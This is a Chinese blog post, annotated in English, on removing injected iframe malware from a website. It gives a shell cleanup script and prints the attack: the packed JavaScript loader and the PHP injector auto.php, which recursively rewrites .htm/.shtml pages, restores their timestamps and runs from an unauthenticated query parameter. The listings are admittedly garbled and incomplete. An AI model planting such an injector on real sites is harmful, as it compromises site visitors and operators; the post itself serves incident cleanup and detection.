小知识:用shell命令删除网站最新nb挂马的方法与代码

复制代码 代码如下:

# NOTE(review): this is the script block found injected into the site's pages. Quote characters and
# the opening <script> tag were lost when the post was published, so it does not parse as shown.
# Statement 1: if no cookie named helio is present, set helio=Yes with a one-hour expiry
# (1*60*60*1000 ms), so the rest runs at most once per hour for a given browser.
# Statement 2: a p,a,c,k,e,d-packed eval. Its word list (document, writeln, iframe, height, width,
# src, http, ...) indicates that it document.writeln()s two iframes that load a remote URL.
# Search keys for infected files: the helio cookie check and the eval(function(p,a,c,k,e,d) header.
# The two three-letter tags in the word list (YNE, ZGH here) are probably random per file, judging by
# the make_pass(3) calls in the injector listed further down, so they make poor signatures.
#

# if(document.cookie.indexOf(helio)==-1){var expires=new Date();expires.setTime(expires.getTime()+1*60*60*1000);document.cookie=helio=Yes;path=/;expires=+expires.toGMTString()

# eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\\w+};c=1};while(c–)if(k[c])p=p.replace(new RegExp(\\b+e(c)+\\b,g),k[c]);return p}(5.l(\<9 7=0 k=1 i=”8://m.n.6.4/a/e.c?2″> <9 7=0 k=1 i=”8://m.n.6.4/a/g.c?3″> \),62,24,|100|YNE|ZGH|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc.split(|),0,{}));} ?:e(parseint(c>

# </script>

确实很让人头痛,还是编写shell 脚本把这些脚本去掉

复制代码 代码如下:

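#!/bin/sh
# Remove the injected "helio" cookie check and the packed eval() loader from
# the static pages below the directory passed as $1.
#
# Differences from a plain `ls $1/*.htm` loop, and why:
#   - walks subdirectories and also covers .html/.shtml, because the injector
#     listed later on this page recurses and matches .htm and .shtml names;
#   - quotes every path, so names containing spaces are handled;
#   - rewrites only files that contain one of the two markers and prints each
#     one, which leaves a list of affected pages for the incident record;
#   - tolerates one optional character (a quote) before helio: quotes are
#     missing from the published listing, the live script most likely has them.
#
# Caveats: matching lines are deleted whole, so a page that keeps all of its
# markup on a single line, or that legitimately ships a p,a,c,k,e,d-packed
# script, loses content. Keep a copy of the web root before running.
# Deleting the injected lines does not remove whatever keeps writing them back.
# Requires GNU sed (for -i) and a find that supports -iname.

if [ "$#" -ne 1 ] || [ ! -d "$1" ]; then
    printf 'usage: %s DIRECTORY\n' "$0" >&2
    exit 2
fi

# Basic regular expressions: "(" is literal in BRE, "\." is a literal dot.
cookie_re='if(document\.cookie\.indexOf(.\{0,1\}helio'
packer_re='eval(function(p,a,c,k,e,d)'

find "$1" -type f \( -iname '*.htm' -o -iname '*.html' -o -iname '*.shtml' \) \
    -exec grep -l -e "$cookie_re" -e "$packer_re" {} + |
while IFS= read -r file
do
    printf 'cleaning: %s\n' "$file"
    sed -i -e "/$cookie_re/d" -e "/$packer_re/d" "$file"
done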

但是第二天页面里又出现了同样的代码,说明只清理页面并没有去掉重新写入它的源头

最后偶然发现 网站中有个auto.php 文件比较可疑

查看其内容,果然是挂马的根源:它会递归遍历目录,把上面的脚本写入 .htm/.shtml 页面

下面是其内容,希望对大家有所帮助(除了删除该文件,还要查清它是怎样被上传到网站的,否则仍可能再次被挂马)

复制代码 代码如下:

// NOTE(review): the opening PHP tag and most quote characters were lost when this listing was
// published; the file does not parse as shown.
// Report fatal errors only, so failed file operations further down produce no output.
error_reporting(E_ERROR);

// Lift the execution time limit so a walk over a large directory tree is not cut short.
set_time_limit(0);

/**
 * Normalises the separators in $path and returns the result.
 *
 * NOTE(review): the string arguments lost their quotes in this listing. The inner call appears to
 * turn backslashes into "/" and the outer call to collapse "//" into "/" -- confirm against the
 * file found on disk.
 */
function CheckPath($path)

{

return str_replace(//,/,str_replace(\\,/,$path));

}

/**
 * Reads the whole of $filename in binary mode and returns what fread() produced.
 *
 * Every call is prefixed with @, so an unreadable or missing file raises no warning; the caller
 * receives whatever fread() returned in that case.
 */
function AutoRead($filename)

{

$handle = @fopen($filename,”rb”);

// Read length is the file's size on disk, i.e. the complete file in one call.
$filecode = @fread($handle,@filesize($filename));

@fclose($handle);

return $filecode;

}

/**
 * Writes $filecode, wrapped in CRLF on both sides, to $filename opened with mode $filemode.
 *
 * Returns true when fwrite() reported bytes written, false otherwise.
 *
 * Relevant for detection: the modification time is saved before the write and put back with
 * touch() afterwards, so a rewritten page keeps its old mtime. Do not rely on mtime to find pages
 * this script changed; compare content hashes against a known-good copy. On Unix-like systems the
 * inode change time (ctime) is not restored by touch() and can still show the change.
 */
function AutoWrite($filename, $filecode ,$filemode)

{

// Remember the current mtime so it can be restored after the write.
$time = @filemtime($filename);

$handle = @fopen($filename,$filemode);

$key = @fwrite($handle,”\r\n”.$filecode.”\r\n”);

if(!$key)

{

// First write failed: make the file world-writable (0666) and try once more.
// Pages left with unexpected 0666 permissions are therefore worth checking.
@chmod($filename,0666);

$key = @fwrite($handle,”\r\n”.$filecode.”\r\n”);

}

@fclose($handle);

// Put the saved mtime back so the file does not look recently modified.
@touch($filename,$time);

return $key ? true : false;

}

/**
 * Returns $length characters picked with rand() from the uppercase letters A-Z.
 *
 * AutoRun() calls this twice with length 3 and puts both results into the script it builds, so the
 * generated script can differ from file to file by those six letters. Signatures for the injected
 * code should key on its fixed parts rather than on these tags.
 */
function make_pass($length)

{

$possible = “ABCDEFGHIJKLMNOPQRSTUVWXYZ”;

$str = “”;

// Append one randomly chosen letter per iteration until the requested length is reached.
while(strlen($str) < $length)

{

$str .= substr($possible,(rand() % strlen($possible)),1);

}

return $str;

}

/**
 * Walks $dir recursively and rewrites every file whose name matches .htm or .shtml so that it
 * contains the script assembled in $code. Prints "ok:<path>" or "err:<path>" per rewritten file
 * and returns true.
 *
 * NOTE(review): quote characters and at least one HTML tag literal were stripped from this
 * listing, and the first base64 literal has been replaced by a placeholder, so several calls below
 * are incomplete as shown.
 */
function AutoRun($dir)

{

$spider = @opendir($dir);

while($file = @readdir($spider))

{

// Entries skipped by name. NOTE(review): a, data, include, member, special, templets and uploads
// look like the directory layout of a DedeCMS install -- confirm against the affected site.
if($file == . || $file == .. || $file == a || $file == images || $file == uploads || $file == special || $file == data || $file == include || $file == member || $file == templets || $file == install) continue;

// First half of the injected script. The base64 literal is missing from this listing.
$code = base64_decode(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);

// Two random three-letter tags, rebuilt for every directory entry.
$code .= make_pass(3);

$code .= |;

$code .= make_pass(3);

// Second half: decodes to the rest of the packer word list, the closing script tag and a closing
// head tag. The script therefore sits directly in front of </head> in an affected page.
$code .= base64_decode(fGNufGRvY3VtZW50fGdvdnxoZWlnaHR8aHR0cHxpZnJhbWV8aW1hZ2VzfGphdmFzY3JpcHR8anBnfGpzfGtpc3N8bGFuZ3VhZ2V8bWlzc3xzY3JpcHR8c3JjfHViYnx3aWR0aHx3cml0ZWxufHd3d3x4Y3JzcmMnLnNwbGl0KCd8JyksMCx7fSkpO30NCjwvc2NyaXB0Pg0KPC9oZWFkPg==);

// As listed, execution stops here and prints $code, so nothing below runs in this copy.
// NOTE(review): probably a leftover from whoever inspected the file -- compare with the copy on disk.
die($code);

$filename = CheckPath($dir./.$file);

// Descend into subdirectories.
if(is_dir($filename)) AutoRun($filename);

// Case-insensitive name match. The pattern is not anchored, so .html names match as well.
if(eregi(\.htm|\.shtml,$file))

{

$checkcode = AutoRead($filename);

// Skip pages that already contain a packed eval. The second test requires a marker string that was
// stripped from the listing; given how $code ends it is presumably the closing head tag.
if((!stristr($checkcode,eval(function()) && stristr($checkcode,))

{

// Replace the marker with $code (which ends in the marker again) and write the page back.
$newcode = str_replace(,$code,$checkcode);

echo AutoWrite($filename, $newcode, “wb”) ? “ok:”.$filename.”\n” : “err:”.$filename.”\n”;

// Push the per-file result to the client immediately.
ob_flush();

flush();

}

}

$checkcode = NULL;

$newcode = NULL;

}

@closedir($spider);

return true;

}

// Entry point: the dir query parameter is handed to AutoRun() without any validation or
// authentication check, so any request that reaches this file can start a run on any directory
// the web server account can access.
// For detection, search the web access logs for requests to this file that carry a dir= parameter;
// they show when runs were started and from which addresses.
if(isset($_GET[dir]))

{

AutoRun($_GET[dir]);

}

// Prints this script's own URL with ?dir= set to the directory the file lives in.
echo http://.$_SERVER[SERVER_NAME].$_SERVER[PHP_SELF].?dir=.CheckPath(dirname(__FILE__));

?>